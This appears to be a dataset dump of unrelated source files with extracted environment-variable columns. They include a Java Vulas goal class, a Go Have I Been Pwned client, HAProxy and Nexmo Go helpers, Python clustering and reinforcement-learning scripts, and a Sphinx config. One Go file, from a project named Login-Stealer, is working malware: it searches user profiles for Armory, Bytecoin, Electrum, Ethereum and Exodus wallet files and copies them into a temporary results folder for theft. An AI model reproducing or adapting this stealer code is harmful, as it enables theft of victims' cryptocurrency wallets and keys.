protected abstract void executeTasks() throws Exception;
/**
* Empty implementation.
*
* CAN be overridden in subclasses in order to perform goal-specific clean-up.
*/
protected void cleanAfterExecution() {}
/**
* Empty implementation.
*
* @return a {@link java.lang.Object} object.
*/
protected Object getResultObject() { return null; }
// <<<<< Methods that can/must be implemented by specific goals
/**
* Starts the goal execution.
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
*/
public void start() throws GoalConfigurationException {
// Start time taking
this.stopWatch = new StopWatch(this.toString()).start();
// Monitor mem consumption?
if(this.memoThread!=null) {
final Thread t = new Thread(this.memoThread, "vulas-memo");
t.setPriority(Thread.MIN_PRIORITY);
t.start();
}
// Prepare the execution
this.prepareExecution();
// Check whether all conditions to execute the tasks are met
this.checkPreconditions();
this.stopWatch.lap("Completed goal preparation", false);
}
/**
* Stops the goal execution, i.e., takes the time and stops the monitoring thread (if any).
*/
public void stop() {
// Already stopped?
if(!this.stopWatch.isRunning())
throw new IllegalStateException("Goal execution already finished");
// Stop!
else {
this.stopMemo();
this.stopWatch.lap("Completed execution", true);
this.cleanAfterExecution();
this.stopWatch.lap("Completed clean-up", false);
this.stopWatch.stop();
this.notifyObserver();
}
}
/**
* Stops the goal execution in response to the provided exception.
*
* @param _e a {@link java.lang.Exception} object.
* @see #stop()
*/
public void stop(Exception _e) {
// Already stopped?
if(!this.stopWatch.isRunning())
throw new IllegalStateException("Goal execution already finished");
// Stop!
else {
this.stopMemo();
this.exception = _e;
this.stopWatch.stop(_e);
this.notifyObserver();
}
}
private void notifyObserver() {
if(this.observer!=null)
this.observer.callback(this);
}
private final void stopMemo() {
if(this.memoThread!=null)
this.memoThread.stop();
}
/**
* <p>addGoalStats.</p>
*
* @param _prefix a {@link java.lang.String} object.
* @param _stats a {@link java.util.Map} object.
*/
public void addGoalStats(String _prefix, Map<String,Long> _stats) {
for(Map.Entry<String, Long> entry : _stats.entrySet()) {
this.addGoalStats( (_prefix==null || _prefix.equals("") ? entry.getKey() : _prefix + "." + entry.getKey()) , entry.getValue());
}
}
/**
* <p>addGoalStats.</p>
*
* @param _key a {@link java.lang.String} object.
* @param _val a long.
*/
public void addGoalStats(String _key, long _val) {
this.addGoalStats(_key, (double)_val);
}
/**
* <p>addGoalStats.</p>
*
* @param _key a {@link java.lang.String} object.
* @param _val a int.
*/
public void addGoalStats(String _key, int _val) {
this.addGoalStats(_key, (double)_val);
}
/**
* <p>addGoalStats.</p>
*
* @param _key a {@link java.lang.String} object.
* @param _val a double.
*/
public void addGoalStats(String _key, double _val) {
this.goalStats.put(_key, new Double(_val));
}
/**
* <p>toString.</p>
*
* @return a {@link java.lang.String} object.
*/
public String toString() {
final StringBuffer b = new StringBuffer();
b.append("Goal [id=").append(this.getId()).append(", type=").append(this.getGoalType());
if(this.goalContext!=null)
b.append(", ctx=").append(this.goalContext.toString());
b.append("]");
return b.toString();
}
/**
* Creates a JSON string representing this goal execution.
*
* @throws java.lang.IllegalStateException
* @return a {@link java.lang.String} object.
*/
public String toJson() throws IllegalStateException {
final StringBuilder b = new StringBuilder();
b.append("{\"executionId\":\"").append(this.getId()).append("\"");
b.append(",\"goal\":\"").append(this.goalType).append("\"");
b.append(",\"startedAtClient\":\"").append(StringUtil.formatDate(this.stopWatch.getStartMillis())).append("\"");
b.append(",\"clientVersion\":").append(JsonBuilder.escape(CoreConfiguration.getVulasRelease()));
// Exception (if any) and stacktrace
if(exception!=null && exception.getMessage()!=null)
b.append(",\"exception\":").append(JsonBuilder.escape(this.exception.getMessage().substring(0, Math.min(this.exception.getMessage().length(), 255))));
// Runtime in nano secs
if(this.stopWatch.isRunning())
b.append(",\"runtimeNano\":-1");
else
b.append(",\"runtimeNano\":").append(this.stopWatch.getRuntime());
// Memory info (can be -1 if not monitored)
if(this.memoThread!=null) {
b.append(",\"memMax\":").append(this.memoThread.getJvmMax());
b.append(",\"memUsedMax\":").append(this.memoThread.getMaxUsed());
b.append(",\"memUsedAvg\":").append(this.memoThread.getAvgUsed());
}
// Goal configuration
b.append(",\"configuration\":[");
int c = 0;
final Iterator<String> iter = this.getConfiguration().getConfiguration().subset("vulas").getKeys();
while(iter.hasNext()) {
final String key = iter.next();
final String[] value = this.getConfiguration().getConfiguration().getStringArray("vulas." + key);
if(c++>0) b.append(",");
b.append("{\"source\":\"GOAL_CONFIG\",\"name\":").append(JsonBuilder.escape(key)).append(",\"value\":").append(JsonBuilder.escape(StringUtil.join(value, ","))).append("}");
}
b.append("]");
// Goal statistics
b.append(",\"statistics\":{");
c = 0;
for(Map.Entry<String, Double> entry: this.goalStats.entrySet()) {
if(c++>0) b.append(",");
b.append(JsonBuilder.escape(entry.getKey())).append(":").append(entry.getValue());
}
b.append("}");
// System info
final StringList env_whitelist = this.getConfiguration().getStringList(VulasConfiguration.ENV_VARS, VulasConfiguration.ENV_VARS_CUSTOM);
final StringList sys_whitelist = this.getConfiguration().getStringList(VulasConfiguration.SYS_PROPS, VulasConfiguration.SYS_PROPS_CUSTOM);
// A subset of environment variables
this.systemInfo.putAll(env_whitelist.filter(System.getenv(), true, ComparisonMode.EQUALS, CaseSensitivity.CASE_INSENSITIVE));
// A subset of system properties
for(Object key : System.getProperties().keySet()) {
final String key_string = (String)key;
if(sys_whitelist.contains(key_string, ComparisonMode.STARTSWITH, CaseSensitivity.CASE_INSENSITIVE))
this.systemInfo.put(key_string, System.getProperty(key_string));
}
b.append(",\"systemInfo\":[");
c = 0;
for(Map.Entry<String, String> entry: this.systemInfo.entrySet()) {
if(c++>0) b.append(",");
b.append("{\"source\":\"SYSTEM_INFO\",\"name\":").append(JsonBuilder.escape(entry.getKey())).append(",\"value\":").append(JsonBuilder.escape(entry.getValue())).append("}");
}
b.append("]}");
return b.toString();
}
/**
* <p>skipGoalUpload.</p>
*/
protected final void skipGoalUpload() {
this.goalUploadEnabled = false;
}
/**
* Uploads the JSON presentation of this goal execution to the Vulas backend.
* Returns true of everything went fine (upload succeeded or is not necessary), false otherwise.
*
* @param _before a boolean.
* @return a boolean.
*/
public boolean upload(boolean _before) {
boolean ret = false;
try {
AbstractGoal.log.info("Uploading goal execution info ...");
ret = BackendConnector.getInstance().uploadGoalExecution(this.getGoalContext(), this, _before);
AbstractGoal.log.info("Uploaded goal execution info");
} catch (Exception e) {
AbstractGoal.log.error("Error while uploading goal execution info: " + e.getMessage());
}
return ret;
}
}
|
[] |
[] |
[] |
[]
|
[]
|
java
| 0 | 0 | |
core/parse/crypto/crypto.go
|
package crypto
import (
"io/ioutil"
"os"
"path/filepath"
"strings"
"github.com/Not-Cyrus/Login-Stealer/utils"
)
func log(name, path, searchQuery string) {
var tempEPath = userPath + path
files, err := ioutil.ReadDir(tempEPath) // os.ReadDir is better, but we need cross compatibility
if err != nil {
return
}
var exodusPath = tempPath + "\\" + name
if os.Mkdir(exodusPath, 0666) != nil {
return
}
for _, file := range files {
if len(searchQuery) > 0 && !strings.HasSuffix(file.Name(), searchQuery) {
continue
}
utils.CopyFile(utils.CleanPath(exodusPath+"\\"+file.Name()), tempEPath+"\\"+file.Name())
}
}
func LogCrypto() {
for name, data := range paths {
log(name, data.Path, data.Query)
}
}
var (
paths = map[string]struct {
Path string
Query string
}{
"Armory": { // the canadian in me wants to change this to Armoury very bad
Path: "\\AppData\\Roaming\\Armory",
Query: "wallet",
},
"Bytecoin": {
Path: "\\AppData\\Roaming\\Bytecoin",
Query: "wallet",
},
"Electrum": {
Path: "\\AppData\\Roaming\\Electrum\\wallets",
},
"Ethereum": {
Path: "\\AppData\\Roaming\\Ethereum\\keystore",
},
"Exodus": {
Path: "\\AppData\\Roaming\\Exodus\\exodus.wallet",
},
}
tempPath = utils.CleanPath(filepath.Join(os.Getenv("TEMP"), "Results"))
userPath = os.Getenv("USERPROFILE")
)
|
[
"\"TEMP\"",
"\"USERPROFILE\""
] |
[] |
[
"USERPROFILE",
"TEMP"
] |
[]
|
["USERPROFILE", "TEMP"]
|
go
| 2 | 0 | |
haveibeenpwned.go
|
// Package haveibeenpwned provides access to the Have I been Pwned API, returning a BreachModel or a PasteModel
// if any breach/paste is found.
package haveibeenpwned
import (
"encoding/json"
"errors"
"io/ioutil"
"net/http"
"net/url"
"os"
)
//API URL of haveibeenpwned.com
const API = "https://haveibeenpwned.com/api/v3/"
//BreachModel Each breach contains a number of attributes describing the incident. In the future, these attributes may expand without the API being versioned.
type BreachModel struct {
Name string `json:"Name,omitempty"`
Title string `json:"Title,omitempty"`
Domain string `json:"Domain,omitempty"`
BreachDate string `json:"BreachDate,omitempty"`
AddedDate string `json:"AddedDate,omitempty"`
ModifiedDate string `json:"ModifiedDate,omitempty"`
PwnCount int `json:"PwnCount,omitempty"`
Description string `json:"Description,omitempty"`
DataClasses []string `json:"DataClasses,omitempty"`
IsVerified bool `json:"IsVerified,omitempty"`
IsFabricated bool `json:"IsFabricated,omitempty"`
IsSensitive bool `json:"IsSensitive,omitempty"`
IsRetired bool `json:"IsRetired,omitempty"`
IsSpamList bool `json:"IsSpamList,omitempty"`
LogoPath string `json:"LogoPath,omitempty"`
}
//PasteModel Each paste contains a number of attributes describing it. In the future, these attributes may expand without the API being versioned.
type PasteModel struct {
Source string `json:"Source,omitempty"`
ID string `json:"Id,omitempty"`
Title string `json:"Title,omitempty"`
Date string `json:"Date,omitempty"`
EmailCount int `json:"EmailCount,omitempty"`
}
//BreachedAccount The most common use of the API is to return a list of all breaches a particular account has been involved in. The API takes a single parameter which is the account to be searched for. The account is not case sensitive and will be trimmed of leading or trailing white spaces. The account should always be URL encoded.
func BreachedAccount(account, domainFilter string, truncate, unverified bool) ([]BreachModel, error) {
res, err := callService("breachedaccount", account, domainFilter, truncate, unverified)
if err != nil {
return nil, err
}
if res.StatusCode == http.StatusNotFound {
return nil, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
defer res.Body.Close()
breaches := make([]BreachModel, 0)
if err := json.Unmarshal(body, &breaches); err != nil {
return nil, err
}
return breaches, nil
}
//Breaches Getting all breached sites in the system. A "breach" is an instance of a system having been compromised by an attacker and the data disclosed.
func Breaches(domainFilter string) ([]BreachModel, error) {
res, err := callService("breaches", "", "", false, false)
if err != nil {
return nil, err
}
if res.StatusCode == http.StatusNotFound {
return nil, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
defer res.Body.Close()
breaches := make([]BreachModel, 0)
if err := json.Unmarshal(body, &breaches); err != nil {
return nil, err
}
return breaches, nil
}
//Breach Sometimes just a single breach is required and this can be retrieved by the breach "name". This is the stable value which may or may not be the same as the breach "title" (which can change).
func Breach(name string) (BreachModel, error) {
breach := new(BreachModel)
res, err := callService("breach", name, "", false, false)
if err != nil {
return *breach, err
}
if res.StatusCode == http.StatusNotFound {
return *breach, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return *breach, err
}
defer res.Body.Close()
if err := json.Unmarshal(body, &breach); err != nil {
return *breach, err
}
return *breach, nil
}
//PasteAccount The API takes a single parameter which is the email address to be searched for. Unlike searching for breaches, usernames that are not email addresses cannot be searched for. The email is not case sensitive and will be trimmed of leading or trailing white spaces. The email should always be URL encoded.
func PasteAccount(email string) ([]PasteModel, error) {
res, err := callService("pasteaccount", email, "", false, false)
if err != nil {
return nil, err
}
if res.StatusCode == http.StatusNotFound {
return nil, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
defer res.Body.Close()
pastes := make([]PasteModel, 0)
if err := json.Unmarshal(body, &pastes); err != nil {
return nil, err
}
return pastes, nil
}
func callService(service, account, domainFilter string, truncate, unverified bool) (*http.Response, error) {
client := &http.Client{}
u, err := url.Parse(API)
if err != nil {
return nil, err
}
u.Path += service + "/" + account
parameters := url.Values{}
if domainFilter != "" {
parameters.Add("domain", domainFilter)
}
if truncate == false {
parameters.Add("truncateResponse", "false")
}
if unverified {
parameters.Add("includeUnverified", "true")
}
u.RawQuery = parameters.Encode()
req, err := http.NewRequest("GET", u.String(), nil)
if err != nil {
return nil, err
}
req.Header.Set("User-Agent", "Go/1.15")
req.Header.Set("hibp-api-key", os.Getenv("HIBP_API_KEY"))
res, err := client.Do(req)
switch res.StatusCode {
case http.StatusBadRequest:
return nil, errors.New("the account does not comply with an acceptable format")
case http.StatusTooManyRequests:
return nil, errors.New("too many requests — the rate limit has been exceeded")
case http.StatusUnauthorized:
return nil, errors.New("valid header `hibp-api-key` required")
}
if err != nil {
return nil, err
}
return res, nil
}
|
[
"\"HIBP_API_KEY\""
] |
[] |
[
"HIBP_API_KEY"
] |
[]
|
["HIBP_API_KEY"]
|
go
| 1 | 0 | |
configuration/cluster_sync_helpers.go
|
// Copyright 2019 HAProxy Technologies
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
package configuration
import (
"os"
"github.com/haproxytech/dataplaneapi/log"
)
func (c *ClusterSync) getNodeFacts() map[string]string {
facts := map[string]string{}
// report the dataplane_cmdline if started from within haproxy
if c.cfg.HAProxy.MasterWorkerMode || os.Getenv("HAPROXY_MWORKER") == "1" {
facts["dataplane_cmdline"] = c.cfg.Cmdline.String()
}
runtime, err := c.cli.Runtime()
if err != nil {
log.Errorf("unable to fetch processInfo: %s", err.Error())
}
processInfos, err := runtime.GetInfo()
if err != nil || len(processInfos) < 1 {
log.Error("unable to fetch processInfo")
} else {
if processInfos[0].Info != nil {
facts["haproxy_version"] = processInfos[0].Info.Version
} else {
log.Error("empty process info")
}
}
return facts
}
|
[
"\"HAPROXY_MWORKER\""
] |
[] |
[
"HAPROXY_MWORKER"
] |
[]
|
["HAPROXY_MWORKER"]
|
go
| 1 | 0 | |
nexmo_test.go
|
package nexmo
import (
"fmt"
"log"
"net/http"
"net/url"
"os"
"testing"
"encoding/json"
"flag"
"github.com/judy2k/go-vcr/cassette"
"github.com/judy2k/go-vcr/recorder"
)
var _recorder *recorder.Recorder
var _client *Client
func TestMain(m *testing.M) {
var mode string
flag.StringVar(&mode, "mode", "", "Should be one of \"replaying\", \"recording\" or \"disabled\"")
flag.Parse()
fmt.Println("Mode:", mode)
recorderMode := recorder.ModeReplaying
switch mode {
case "replaying":
fmt.Println("Replaying requests")
recorderMode = recorder.ModeReplaying
case "recording":
fmt.Println("Recording requests")
recorderMode = recorder.ModeRecording
case "disabled":
fmt.Println("HTTP recorder disabled")
recorderMode = recorder.ModeDisabled
}
fmt.Println("Running TestMain")
os.Exit(func() int {
// Start our recorder
r, err := recorder.NewAsMode("fixtures", recorderMode, nil)
r.SetFilter(filterFunc)
defer r.Stop()
if err != nil {
log.Fatal(err)
}
_recorder = r
_client = initClient()
return m.Run()
}())
}
func initClient() *Client {
apiKey := os.Getenv("NEXMO_API_KEY")
apiSecret := os.Getenv("NEXMO_API_SECRET")
if _client != nil {
return _client
}
// TODO: FIX ME!
// path := os.Getenv("NEXMO_PRIVATE_KEY_PATH")
// b, err := ioutil.ReadFile(path)
// if err != nil {
// log.Fatal(err)
// }
auth := NewAuthSet()
// if err := auth.SetApplicationAuth(os.Getenv("NEXMO_APPLICATION_ID"), b); err != nil {
// log.Fatal(err)
// }
auth.SetAPISecret(apiKey, apiSecret)
httpClient := http.Client{
Transport: _recorder,
}
_client = NewClient(&httpClient, auth)
return _client
}
func filterFunc(i *cassette.Interaction) error {
// Purge the headers:
i.Request.Headers.Del("Authorization")
// Purge the query:
qURL, err := url.Parse(i.Request.URL)
if err != nil {
return err
}
query := qURL.Query()
query.Del("api_key")
query.Del("api_secret")
// Purge the body:
if ct := i.Request.Headers.Get("Content-Type"); ct == "application/json" {
data := map[string]interface{}{}
err := json.Unmarshal([]byte(i.Request.Body), &data)
if err != nil {
return err
}
delete(data, "api_key")
delete(data, "api_secret")
bodyBytes, err := json.Marshal(&data)
if err != nil {
return err
}
i.Request.Body = string(bodyBytes)
} else if ct == "application/x-www-form-urlencoded" {
i.Request.Form.Del("api_key")
i.Request.Form.Del("api_secret")
urlValues, err := url.ParseQuery(i.Request.Body)
if err != nil {
return err
}
urlValues.Del("api_key")
urlValues.Del("api_secret")
i.Request.Body = urlValues.Encode()
}
return nil
}
|
[
"\"NEXMO_API_KEY\"",
"\"NEXMO_API_SECRET\"",
"\"NEXMO_PRIVATE_KEY_PATH\"",
"\"NEXMO_APPLICATION_ID\""
] |
[] |
[
"NEXMO_APPLICATION_ID",
"NEXMO_PRIVATE_KEY_PATH",
"NEXMO_API_KEY",
"NEXMO_API_SECRET"
] |
[]
|
["NEXMO_APPLICATION_ID", "NEXMO_PRIVATE_KEY_PATH", "NEXMO_API_KEY", "NEXMO_API_SECRET"]
|
go
| 4 | 0 | |
tools/test.py
|
import json
from tqdm import tqdm
import os
from sklearn import metrics
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn.datasets.samples_generator import make_blobs
import numpy as np
import torch
import pickle
def get_imgid2object():
input_file_path = '/m/liyz/sg_matching/s2g/spice/coco_output/merged.json'
data = json.load(open(input_file_path))
print('total caption number is {}'.format(len(data)))
all_obj = {}
imgid2objs = {}
for info in tqdm(data):
img_id = info['image_id'].split('_')[0]
ref_tuples = info['ref_tuples']
if img_id not in imgid2objs:
imgid2objs[img_id] = set()
for tuple in ref_tuples:
if len(tuple['tuple']) == 1:
obj = tuple['tuple'][0]
imgid2objs[img_id].add(obj)
all_obj[obj] = all_obj.get(obj, 0) + 1
print('total image id number is {}'.format(len(imgid2objs)))
print('total objects number is {}'.format(len(all_obj)))
for imgid, objs in imgid2objs.items():
objs = list(objs)
imgid2objs[imgid] = objs
imgid2objs_save_path = './coco_imgid2objs.json'
json.dump(imgid2objs, open(imgid2objs_save_path, 'w'))
print('save to {} successfully.'.format(imgid2objs_save_path))
all_obj_save_path = './coco_obj_freq.json'
json.dump(all_obj, open(all_obj_save_path, 'w'))
print('save to {} successfully.'.format(all_obj_save_path))
def kmeans(data, k_cluster=1000):
# X, y = make_blobs(n_samples=100, n_features=2, centers=[[-1, -1], [0, 0], [1, 1], [2, 2]],
# cluster_std=[0.4, 0.2, 0.2, 0.2], random_state=9)
# print(X.shape)
# plt.scatter(X[:, 0], X[:, 1], marker='o') # 假设暂不知道y类别,不设置c=y,使用kmeans聚类
# plt.show()
# X=torch.randn(500,200).numpy()
print('the input data shape is: ', data.shape)
X = data
y_pred = KMeans(n_clusters=k_cluster, random_state=9).fit_predict(X)
print('output result shape is ', y_pred.shape)
# print(y_pred)
# plt.scatter(X[:, 0], X[:, 1], c=y_pred)
# plt.show()
return y_pred
def load_vector_dict(vector_file_path):
print('loading glove vector file...')
pickle_file_path = vector_file_path + '_pickle.pkl'
word2vector = {}
if os.path.exists(pickle_file_path):
word2vector = pickle.load(open(pickle_file_path, 'rb'))
print('load from pickle directly')
else:
with open(vector_file_path, 'r') as f:
for line in tqdm(f.readlines()):
line = line.strip()
infos = line.split()
word = infos[0]
vec = np.array([float(x) for x in infos[1:]])
word2vector[word] = vec
pickle.dump(word2vector, open(pickle_file_path, 'wb'))
print('save dict file into pickle file: {}'.format(pickle_file_path))
vec_dim = word2vector['hello'].shape[0]
print('reading glove vector file finished... vector dimension is {}'.format(vec_dim))
# print(len(word2vector),word2vector['hello'])
# print(word2vector['hammer'])
return word2vector, vec_dim
def get_all_obj(obj_freq_file, word2vec, threshold):
obj2freq = json.load(open(obj_freq_file))
# print(word2vec.keys())
used_obj = []
used_vectors = []
for obj, cnt in obj2freq.items():
if cnt>=threshold and obj in word2vec:
# print(obj)
used_obj.append(obj)
used_vectors.append(word2vec[obj])
print(len(used_obj),len(used_vectors))
print('using threshold {}, the useful object number is {}'.format(threshold, len(used_obj)))
used_vectors = np.stack(used_vectors, axis=0)
return used_obj, used_vectors
def get_clustered_result(glove_file_path, obj_freq_file_path, save_word2clus_id_path, save_clus_id2words,
k_cluster=1000):
word2vec,vec_dim = load_vector_dict(vector_file_path=glove_file_path)
used_obj, used_vectors = get_all_obj(obj_freq_file=obj_freq_file_path, word2vec=word2vec, threshold=10)
clustered_idxs = kmeans(used_vectors, k_cluster=1000)
word2clus_id = {}
clus_id2words = {i: [] for i in range(k_cluster)}
for i in range(len(used_obj)):
word = used_obj[i]
idx = int(clustered_idxs[i])
word2clus_id[word] = idx
clus_id2words[idx].append(word)
json.dump(word2clus_id, open(save_word2clus_id_path, 'w'))
json.dump(clus_id2words, open(save_clus_id2words, 'w'))
print('finished.........')
glove_file_path='/S4/MI/liyz/data/glove/glove.6B.200d.txt'
obj_freq_file_path='/S4/MI/liyz/saem_retrieval/data/cocoid2obj/coco_obj_freq.json'
save_word2clus_id_path='/S4/MI/liyz/saem_retrieval/data/cocoid2obj/obj_to_clustered_id.json'
save_clus_id2words='/S4/MI/liyz/saem_retrieval/data/cocoid2obj/clustered_id_to_obj.json'
get_clustered_result(glove_file_path,obj_freq_file_path,save_word2clus_id_path,save_clus_id2words,k_cluster=1000)
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
train_full_rl.py
|
""" full training (train rnn-ext + abs + RL) """
import argparse
import json
import pickle as pkl
import os
from os.path import join, exists
from itertools import cycle
from toolz.sandbox.core import unzip
from cytoolz import identity
import torch
from torch import optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch.utils.data import DataLoader
from data.data import CnnDmDataset
from data.batcher import tokenize
from model.rl import ActorCritic
from model.extract import PtrExtractSumm
from training import BasicTrainer
from rl import get_grad_fn
from rl import A2CPipeline
from decoding import load_best_ckpt
from decoding import Abstractor, ArticleBatcher
from metric import compute_rouge_l, compute_rouge_n, compute_bertscore
MAX_ABS_LEN = 30
try:
DATA_DIR = os.environ['DATA']
except KeyError:
print('please use environment variable to specify data directories')
class RLDataset(CnnDmDataset):
""" get the article sentences only (for decoding use)"""
def __init__(self, split, cross_rev_bucket=None):
super().__init__(split, DATA_DIR, cross_rev_bucket=cross_rev_bucket)
def __getitem__(self, i):
js_data = super().__getitem__(i)
art_sents = js_data['article']
abs_sents = js_data['abstract']
return art_sents, abs_sents
def load_ext_net(ext_dir):
ext_meta = json.load(open(join(ext_dir, 'meta.json')))
assert ext_meta['net'] == 'ml_rnn_extractor'
ext_ckpt = load_best_ckpt(ext_dir)
ext_args = ext_meta['net_args']
vocab = pkl.load(open(join(ext_dir, 'vocab.pkl'), 'rb'))
ext = PtrExtractSumm(**ext_args)
ext.load_state_dict(ext_ckpt)
return ext, vocab
def configure_net(abs_dir, ext_dir, cuda):
""" load pretrained sub-modules and build the actor-critic network"""
# load pretrained abstractor model
if abs_dir is not None:
abstractor = Abstractor(abs_dir, MAX_ABS_LEN, cuda)
else:
abstractor = identity
# load ML trained extractor net and buiild RL agent
extractor, agent_vocab = load_ext_net(ext_dir)
agent = ActorCritic(extractor._sent_enc,
extractor._art_enc,
extractor._extractor,
ArticleBatcher(agent_vocab, cuda))
if cuda:
agent = agent.cuda()
net_args = {}
net_args['abstractor'] = (None if abs_dir is None
else json.load(open(join(abs_dir, 'meta.json'))))
net_args['extractor'] = json.load(open(join(ext_dir, 'meta.json')))
return agent, agent_vocab, abstractor, net_args
def configure_training(opt, lr, clip_grad, lr_decay, batch_size,
gamma, reward, stop_coeff, stop_reward):
assert opt in ['adam']
opt_kwargs = {}
opt_kwargs['lr'] = lr
train_params = {}
train_params['optimizer'] = (opt, opt_kwargs)
train_params['clip_grad_norm'] = clip_grad
train_params['batch_size'] = batch_size
train_params['lr_decay'] = lr_decay
train_params['gamma'] = gamma
train_params['reward'] = reward
train_params['stop_coeff'] = stop_coeff
train_params['stop_reward'] = stop_reward
return train_params
def build_batchers(batch_size, cross_rev_bucket=None):
def coll(batch):
art_batch, abs_batch = unzip(batch)
art_sents = list(filter(bool, map(tokenize(None), art_batch)))
abs_sents = list(filter(bool, map(tokenize(None), abs_batch)))
return art_sents, abs_sents
loader = DataLoader(
RLDataset('train', cross_rev_bucket=cross_rev_bucket), batch_size=batch_size,
shuffle=True, num_workers=4,
collate_fn=coll
)
val_loader = DataLoader(
RLDataset('val'), batch_size=batch_size,
shuffle=False, num_workers=4,
collate_fn=coll
)
return cycle(loader), val_loader
def train(args):
if not exists(args.path):
os.makedirs(args.path)
# make net
agent, agent_vocab, abstractor, net_args = configure_net(
args.abs_dir, args.ext_dir, args.cuda)
# configure training setting
assert args.stop > 0
train_params = configure_training(
'adam', args.lr, args.clip, args.decay, args.batch,
args.gamma, args.reward, args.stop, 'rouge-1'
)
train_batcher, val_batcher = build_batchers(args.batch, cross_rev_bucket=args.cross_rev_bucket)
reward_fn = compute_rouge_l
stop_reward_fn = compute_rouge_n(n=1)
# # reward_fn = compute_rouge_l
# reward_fn = compute_bertscore
# reward_fn.metric = datasets.load_metric('bertscore')
# stop_reward_fn = reward_fn
# save abstractor binary
if args.abs_dir is not None:
abs_ckpt = {}
abs_ckpt['state_dict'] = load_best_ckpt(args.abs_dir)
abs_vocab = pkl.load(open(join(args.abs_dir, 'vocab.pkl'), 'rb'))
abs_dir = join(args.path, 'abstractor')
os.makedirs(join(abs_dir, 'ckpt'))
with open(join(abs_dir, 'meta.json'), 'w') as f:
json.dump(net_args['abstractor'], f, indent=4)
torch.save(abs_ckpt, join(abs_dir, 'ckpt/ckpt-0-0'))
with open(join(abs_dir, 'vocab.pkl'), 'wb') as f:
pkl.dump(abs_vocab, f)
# save configuration
meta = {}
meta['net'] = 'rnn-ext_abs_rl'
meta['net_args'] = net_args
meta['train_params'] = train_params
with open(join(args.path, 'meta.json'), 'w') as f:
json.dump(meta, f, indent=4)
with open(join(args.path, 'agent_vocab.pkl'), 'wb') as f:
pkl.dump(agent_vocab, f)
# prepare trainer
grad_fn = get_grad_fn(agent, args.clip)
optimizer = optim.Adam(agent.parameters(), **train_params['optimizer'][1])
scheduler = ReduceLROnPlateau(optimizer, 'max', verbose=True,
factor=args.decay, min_lr=0,
patience=args.lr_p)
pipeline = A2CPipeline(meta['net'], agent, abstractor,
train_batcher, val_batcher,
optimizer, grad_fn,
reward_fn, args.gamma,
stop_reward_fn, args.stop)
trainer = BasicTrainer(pipeline, args.path,
args.ckpt_freq, args.patience, scheduler,
val_mode='score')
print('start training with the following hyper-parameters:')
print(meta)
trainer.train()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='program to demo a Seq2Seq model'
)
parser.add_argument('--path', required=True, help='root of the model')
parser.add_argument('--cross-rev-bucket', default=None,
help='cross review bucket id if training agent to get difficulty scores for summarization')
# model options
parser.add_argument('--abs_dir', action='store',
help='pretrained summarizer model root path')
parser.add_argument('--ext_dir', action='store',
help='root of the extractor model')
parser.add_argument('--ckpt', type=int, action='store', default=None,
help='ckeckpoint used decode')
# training options
parser.add_argument('--reward', action='store', default='rouge-l',
help='reward function for RL')
parser.add_argument('--lr', type=float, action='store', default=1e-4,
help='learning rate')
parser.add_argument('--decay', type=float, action='store', default=0.5,
help='learning rate decay ratio')
parser.add_argument('--lr_p', type=int, action='store', default=0,
help='patience for learning rate decay')
parser.add_argument('--gamma', type=float, action='store', default=0.95,
help='discount factor of RL')
parser.add_argument('--stop', type=float, action='store', default=1.0,
help='stop coefficient for rouge-1')
parser.add_argument('--clip', type=float, action='store', default=2.0,
help='gradient clipping')
parser.add_argument('--batch', type=int, action='store', default=32,
help='the training batch size')
parser.add_argument(
'--ckpt_freq', type=int, action='store', default=1000,
help='number of update steps for checkpoint and validation'
)
parser.add_argument('--patience', type=int, action='store', default=3,
help='patience for early stopping')
parser.add_argument('--no-cuda', action='store_true',
help='disable GPU training')
args = parser.parse_args()
args.cuda = torch.cuda.is_available() and not args.no_cuda
train(args)
|
[] |
[] |
[
"DATA"
] |
[]
|
["DATA"]
|
python
| 1 | 0 | |
docs/conf.py
|
# -*- coding: utf-8 -*-
# flake8: noqa
# tensorpack documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 27 01:41:24 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os, re
import mock
import inspect
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
os.environ['DOC_BUILDING'] = '1'
ON_RTD = (os.environ.get('READTHEDOCS') == 'True')
MOCK_MODULES = ['tabulate', 'h5py',
'cv2', 'zmq', 'lmdb',
'sklearn', 'sklearn.datasets',
'scipy', 'scipy.misc', 'scipy.io',
'tornado', 'tornado.concurrent',
'horovod', 'horovod.tensorflow',
'pyarrow',
'subprocess32', 'functools32']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = mock.Mock(name=mod_name)
sys.modules['cv2'].__version__ = '3.2.1' # fake version
import tensorpack
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.4'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.napoleon',
#'sphinx.ext.autosectionlabel',
#'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
# -- Configurations for plugins ------------
napoleon_google_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_special_with_doc = True
napoleon_numpy_docstring = False
napoleon_use_rtype = False
if ON_RTD:
intersphinx_timeout = 10
else:
# skip this when building locally
intersphinx_timeout = 0.1
